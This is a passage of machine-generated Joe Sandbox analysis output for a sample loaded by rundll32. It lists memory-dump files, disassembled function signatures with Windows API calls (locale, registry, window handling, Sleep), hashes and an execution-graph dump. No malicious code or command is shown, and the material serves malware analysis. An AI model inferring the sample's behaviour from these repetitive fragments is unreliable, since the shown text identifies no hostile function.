                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: FileHandleWrite
                              • String ID:
                              • API String ID: 3320372497-0
                              • Opcode ID: 8c19eb35cc905a198742c5c38a1e3f789eb2a8dac1a6bc0cfe1afb4cb38bae9c
                              • Instruction ID: c0787933979ba1f61242edc03ca0e4b3801d14d1e4c42a5233f8958f5bbc6d4a
                              • Opcode Fuzzy Hash: 8c19eb35cc905a198742c5c38a1e3f789eb2a8dac1a6bc0cfe1afb4cb38bae9c
                              • Instruction Fuzzy Hash: 870168A9A542147FF510F6B89E88FAF2A8CDFDAB68F500615B218DB0D2CD54FC0487B1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • Sleep.KERNEL32(00000000), ref: 04A45A67
                              • Sleep.KERNEL32(0000000A,00000000), ref: 04A45A7D
                              • Sleep.KERNEL32(00000000), ref: 04A45AAB
                              • Sleep.KERNEL32(0000000A,00000000), ref: 04A45AC1
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: f51d6a613e34d0ce4a69236252e22963811ffbe044504552ff0548df3379bcc5
                              • Instruction ID: f78a11895c7531a030a937bbcaa03e3b7f146ddb11ad7731bd7fb5010eedba23
                              • Opcode Fuzzy Hash: f51d6a613e34d0ce4a69236252e22963811ffbe044504552ff0548df3379bcc5
                              • Instruction Fuzzy Hash: A4C12376A01291AFD719CF69E588319BBE0FBC5310F1981BED2058B385DBB5BC51CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • EnumWindows.USER32(04C364D4,00000000), ref: 04C3661E
                              • ShowWindow.USER32(?,00000000,04C364D4,00000000), ref: 04C36660
                              • ShowOwnedPopups.USER32(00000000,?), ref: 04C3668F
                              • ShowWindow.USER32(?,00000005), ref: 04C36704
                              • ShowOwnedPopups.USER32(00000000,?), ref: 04C36733
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: Show$OwnedPopupsWindow$EnumWindows
                              • String ID:
                              • API String ID: 315437064-0
                              • Opcode ID: cb34c9d34ae779a5747328576e69dda253275c6fc0ae5356376e021577093da6
                              • Instruction ID: 24e256e1af59eb4769188911adf8c0c1c933390192ebd0b4402a963b808a8986
                              • Opcode Fuzzy Hash: cb34c9d34ae779a5747328576e69dda253275c6fc0ae5356376e021577093da6
                              • Instruction Fuzzy Hash: C0418274700B00AFE730DB38C588BAA73F3FB85359F450968D969872A1C774B985DB01
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • UnhookWindowsHookEx.USER32(00000000), ref: 04C356E6
                              • SetEvent.KERNEL32(00000000), ref: 04C35712
                              • GetCurrentThreadId.KERNEL32 ref: 04C35717
                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 04C35740
                              • CloseHandle.KERNEL32(00000000,00000000), ref: 04C3574D
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                              • String ID:
                              • API String ID: 2132507429-0
                              • Opcode ID: 9aa4b1686d8047c96358040e984795b155d65b7f651ed5cfbd8d139fbf019f5e
                              • Instruction ID: e78664f87c0ea11a45fd5b2ca65cd6d267c983a1b107cbae86820f8fe8e00b8d
                              • Opcode Fuzzy Hash: 9aa4b1686d8047c96358040e984795b155d65b7f651ed5cfbd8d139fbf019f5e
                              • Instruction Fuzzy Hash: 2901A978A44301EFF714EF65DB44B5A33E5EB4535DF408625A6A8C71E0DB34B840DB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetThreadUILanguage.KERNEL32(?,00000000), ref: 04A4DD89
                              • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 04A4DDE7
                              • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 04A4DE44
                              • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 04A4DE77
                                • Part of subcall function 04A4DD34: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,04A4DDF5), ref: 04A4DD4B
                                • Part of subcall function 04A4DD34: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,04A4DDF5), ref: 04A4DD68
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: Thread$LanguagesPreferred$Language
                              • String ID:
                              • API String ID: 2255706666-0
                              • Opcode ID: 28b55711f5d25e4671d500ef3452714272e39701d2f291c9a093c09e8f8865e8
                              • Instruction ID: cde6e23577fa4d9063bb44a9180eeb09576d7b6c2483f4fea4f9645e20275773
                              • Opcode Fuzzy Hash: 28b55711f5d25e4671d500ef3452714272e39701d2f291c9a093c09e8f8865e8
                              • Instruction Fuzzy Hash: 33314E30A0021AEBDF10DFE8C885AEEB7B4FF94304F504565D511E7290DB78AE05CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetWindow.USER32(?,00000004), ref: 04C364E6
                              • GetWindowThreadProcessId.USER32(?,?), ref: 04C36503
                              • GetCurrentProcessId.KERNEL32(?,00000004), ref: 04C3650F
                              • IsWindowVisible.USER32(?), ref: 04C36569
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: Window$Process$CurrentThreadVisible
                              • String ID:
                              • API String ID: 3926708836-0
                              • Opcode ID: df38909f12489a98e0e4182c39566f624a2b38d1041908e398e7bfef999e842c
                              • Instruction ID: 540d9734ff080940ec35b89d22c56f4ad1616c7cbb8c7cf34844491a7c030613
                              • Opcode Fuzzy Hash: df38909f12489a98e0e4182c39566f624a2b38d1041908e398e7bfef999e842c
                              • Instruction Fuzzy Hash: 5E313A39B00205ABDB60EF5AD9C4BAA73A5EB14358F0441B1ED14E7346DB34FE508B50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SetActiveWindow.USER32(?,?,04CA01D8,04C37DC8), ref: 04C3714E
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: ActiveWindow
                              • String ID:
                              • API String ID: 2558294473-0
                              • Opcode ID: 3a3482db3d3017f85c8397938c9e80ebde1f586c6287a5805f17761587ae5c45
                              • Instruction ID: 8bfcdc6ac360bc4c937c7c03059c98c9aae9f20a77fb1ba4a3a72f0dfaa44a4a
                              • Opcode Fuzzy Hash: 3a3482db3d3017f85c8397938c9e80ebde1f586c6287a5805f17761587ae5c45
                              • Instruction Fuzzy Hash: 69310BB0601240ABEB54FE68C9C4B9A33A76F08309F4884B5FD09DF25ADA75FD85D760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • EnumWindows.USER32(04C361C0), ref: 04C362B1
                              • GetWindow.USER32(00000003,00000003), ref: 04C362C9
                              • GetWindowLongW.USER32(00000000,000000EC), ref: 04C362D6
                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 04C36315
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: Window$EnumLongWindows
                              • String ID:
                              • API String ID: 4191631535-0
                              • Opcode ID: 92e502c498d44fee7a6c5308155917831f96f1f5a93062beca4544e5f2f07d6a
                              • Instruction ID: e7851cae812b92389c7d1d0c3d61375d3effa6e618a0c01d133f872a481e368c
                              • Opcode Fuzzy Hash: 92e502c498d44fee7a6c5308155917831f96f1f5a93062beca4544e5f2f07d6a
                              • Instruction Fuzzy Hash: 8B11AC30704300BFEB20EA28CA80F9A7794DF05725F158274FD98AF2D1C770A945CB62
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetWindowThreadProcessId.USER32(00000000), ref: 04B73E7D
                              • GetCurrentProcessId.KERNEL32(?,?,00000000,04C3985D,?,?,?,00000001,04C37A37), ref: 04B73E86
                              • GlobalFindAtomW.KERNEL32(00000000), ref: 04B73E9B
                              • GetPropW.USER32(00000000,00000000), ref: 04B73EB2
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                              • String ID:
                              • API String ID: 2582817389-0
                              • Opcode ID: eec5c36431bff6ce7a63abd03a8fb1d1ecdcaaac8e8a735f5d1e7fe7e236b430
                              • Instruction ID: cefbd618561b81732a32c8cb851dcba8ae87c2b04f08e5495c5bee421b87dd96
                              • Opcode Fuzzy Hash: eec5c36431bff6ce7a63abd03a8fb1d1ecdcaaac8e8a735f5d1e7fe7e236b430
                              • Instruction Fuzzy Hash: 7BF065757002316AAA21BBB55E8097F62DCCB042AD3481C61FD59C7191D639FC45D774
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Execution Graph

                              Execution Coverage:7.2%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0.9%
                              Total number of Nodes:1354
                              Total number of Limit Nodes:27
                              execution_graph 11570 43cd658 11571 43cd668 GetModuleFileNameW 11570->11571 11572 43cd684 11570->11572 11574 43ce8cc GetModuleFileNameW 11571->11574 11575 43ce91a 11574->11575 11580 43ce7a8 11575->11580 11577 43ce946 11578 43ce958 LoadLibraryExW 11577->11578 11579 43ce960 11577->11579 11578->11579 11579->11572 11584 43ce7c9 11580->11584 11581 43ce851 11581->11577 11583 43ce83e 11585 43ce844 11583->11585 11586 43ce853 GetUserDefaultUILanguage 11583->11586 11584->11581 11598 43ce4e4 11584->11598 11587 43ce610 2 API calls 11585->11587 11602 43cde94 EnterCriticalSection 11586->11602 11587->11581 11589 43ce860 11622 43ce610 11589->11622 11591 43ce86d 11592 43ce895 11591->11592 11593 43ce87b GetSystemDefaultUILanguage 11591->11593 11592->11581 11626 43ce6dc 11592->11626 11595 43cde94 17 API calls 11593->11595 11596 43ce888 11595->11596 11597 43ce610 2 API calls 11596->11597 11597->11592 11599 43ce506 11598->11599 11601 43ce510 11598->11601 11634 43ce1c8 11599->11634 11601->11583 11603 43cdee0 LeaveCriticalSection 11602->11603 11604 43cdec0 11602->11604 11671 43cad14 11603->11671 11606 43cded1 LeaveCriticalSection 11604->11606 11616 43cdf82 11606->11616 11607 43cdef1 IsValidLocale 11608 43cdf4f EnterCriticalSection 11607->11608 11609 43cdf00 11607->11609 11610 43cdf67 11608->11610 11611 43cdf09 11609->11611 11612 43cdf14 11609->11612 11619 43cdf78 LeaveCriticalSection 11610->11619 11673 43cdd78 GetThreadUILanguage 11611->11673 11686 43cdb7c 11612->11686 11615 43cdf1d GetSystemDefaultUILanguage 11615->11608 11618 43cdf27 11615->11618 11616->11589 11617 43cdf12 11617->11608 11620 43cdf38 GetSystemDefaultUILanguage 11618->11620 11619->11616 11621 43cdb7c 3 API calls 11620->11621 11621->11617 11623 43ce62e 11622->11623 11624 43ce6a9 11623->11624 11695 43ce5a4 11623->11695 11624->11591 11700 43cadf8 11626->11700 11629 43ce72c 11630 43ce5a4 2 API calls 11629->11630 11632 43ce740 11630->11632 11631 43ce76e 11631->11581 11632->11631 11633 43ce5a4 2 API calls 11632->11633 11633->11631 11635 43ce1df 11634->11635 11636 43ce1f3 GetModuleFileNameW 11635->11636 11637 43ce208 11635->11637 11636->11637 11638 43ce230 RegOpenKeyExW 11637->11638 11645 43ce3d7 11637->11645 11639 43ce257 RegOpenKeyExW 11638->11639 11640 43ce2f1 11638->11640 11639->11640 11642 43ce275 RegOpenKeyExW 11639->11642 11655 43cdfd8 GetModuleHandleW 11640->11655 11642->11640 11643 43ce293 RegOpenKeyExW 11642->11643 11643->11640 11646 43ce2b1 RegOpenKeyExW 11643->11646 11644 43ce30f RegQueryValueExW 11647 43ce32d 11644->11647 11648 43ce360 RegQueryValueExW 11644->11648 11645->11601 11646->11640 11649 43ce2cf RegOpenKeyExW 11646->11649 11651 43ce335 RegQueryValueExW 11647->11651 11650 43ce37c 11648->11650 11652 43ce35e 11648->11652 11649->11640 11649->11645 11654 43ce384 RegQueryValueExW 11650->11654 11651->11652 11653 43ce3c6 RegCloseKey 11652->11653 11653->11601 11654->11652 11656 43ce011 11655->11656 11657 43ce000 GetProcAddress 11655->11657 11661 43ce027 11656->11661 11665 43ce073 11656->11665 11667 43cdfb4 11656->11667 11657->11656 11660 43cdfb4 CharNextW 11660->11665 11661->11644 11662 43cdfb4 CharNextW 11662->11665 11663 43ce0f8 FindFirstFileW 11663->11661 11664 43ce114 FindClose lstrlenW 11663->11664 11664->11661 11664->11665 11665->11661 11665->11662 11665->11663 11666 43ce162 lstrlenW 11665->11666 11666->11665 11668 43cdfc2 11667->11668 11669 43cdfd0 11668->11669 11670 43cdfba CharNextW 11668->11670 11669->11660 11669->11661 11670->11668 11672 43cad1a 11671->11672 11672->11607 11674 43cdded 11673->11674 11675 43cdd94 11673->11675 11676 43cdd34 2 API calls 11674->11676 11691 43cdd34 GetThreadPreferredUILanguages 11675->11691 11681 43cddf5 11676->11681 11679 43cde3c SetThreadPreferredUILanguages 11682 43cdd34 2 API calls 11679->11682 11681->11679 11685 43cde7d 11681->11685 11683 43cde52 11682->11683 11684 43cde6d SetThreadPreferredUILanguages 11683->11684 11683->11685 11684->11685 11685->11617 11687 43cdbb7 11686->11687 11688 43cdc20 IsValidLocale 11687->11688 11690 43cdc6e 11687->11690 11689 43cdc33 GetLocaleInfoW GetLocaleInfoW 11688->11689 11688->11690 11689->11690 11690->11615 11692 43cdd6e SetThreadPreferredUILanguages 11691->11692 11693 43cdd55 11691->11693 11692->11674 11694 43cdd5e GetThreadPreferredUILanguages 11693->11694 11694->11692 11696 43ce5b9 11695->11696 11697 43ce5d6 FindFirstFileW 11696->11697 11698 43ce5e6 FindClose 11697->11698 11699 43ce5ec 11697->11699 11698->11699 11699->11623 11701 43cadfc GetUserDefaultUILanguage GetLocaleInfoW 11700->11701 11701->11629 11702 4607184 11703 4607192 11702->11703 11717 45b7bd4 11703->11717 11705 46071ab 11706 45b7bd4 10 API calls 11705->11706 11707 46071be 11706->11707 11708 45b7bd4 10 API calls 11707->11708 11709 46071d1 11708->11709 11710 45b7bd4 10 API calls 11709->11710 11711 46071e4 11710->11711 11712 45b7bd4 10 API calls 11711->11712 11713 46071f7 11712->11713 11723 45b7d30 11713->11723 11715 46071fe 11736 45b7aa4 11715->11736 11719 45b7bee 11717->11719 11718 45b7cef 11718->11705 11719->11718 11720 45b7ca9 GetWindowLongW SetWindowLongW 11719->11720 11721 45b7cd1 11719->11721 11720->11721 11740 45aa980 GetWindowLongW 11721->11740 11725 45b7d5c 11723->11725 11724 45b7e29 11724->11715 11725->11724 11728 45b7d77 11725->11728 11751 45af3e4 11725->11751 11727 45b7dc0 11755 45b7120 11727->11755 11728->11727 11730 45b7de1 11728->11730 11732 45b7ddf 11728->11732 11780 45ad8b4 11730->11780 11732->11724 11784 45b7abc 11732->11784 11737 45b7aaa 11736->11737 11738 45b7990 129 API calls 11737->11738 11739 45b7ab7 11737->11739 11738->11737 11739->11715 11741 45aa999 11740->11741 11742 45aa9bb IsIconic IsWindowVisible 11741->11742 11743 45aaa3c 11741->11743 11744 45aa9ee 11742->11744 11745 45aa9e6 ShowWindow 11742->11745 11743->11718 11746 45aa9f2 SetWindowLongW 11744->11746 11747 45aaa03 SetWindowLongW 11744->11747 11745->11744 11748 45aaa12 11746->11748 11747->11748 11748->11743 11749 45aaa2a ShowWindow 11748->11749 11750 45aaa34 ShowWindow 11748->11750 11749->11743 11750->11743 11752 45af41f 11751->11752 11753 45af3f2 11751->11753 11752->11728 11753->11752 11754 45af419 ShowWindow 11753->11754 11754->11752 11789 45aa8fc 11755->11789 11757 45b712f 11758 45b718a 11757->11758 11792 45b6384 11757->11792 11758->11732 11777 45b2be8 11758->11777 11760 45b713e 11761 45b7153 11760->11761 11762 45b7147 SetActiveWindow 11760->11762 11795 45b65e0 11761->11795 11762->11761 11764 45b7160 11765 45b719b 11764->11765 11768 45b7169 11764->11768 11766 45b8c04 2 API calls 11765->11766 11771 45b71a8 11766->11771 11767 45b721b 11813 45b57b4 11767->11813 11768->11758 11810 45b8c04 IsWindowEnabled 11768->11810 11771->11767 11773 45b71c5 IsWindowEnabled 11771->11773 11773->11767 11775 45b71cf 11773->11775 11774 45af3e4 ShowWindow 11774->11758 11776 45b71f4 SetWindowPos DefWindowProcW 11775->11776 11776->11758 11778 45ad8b4 78 API calls 11777->11778 11779 45b2bf4 11778->11779 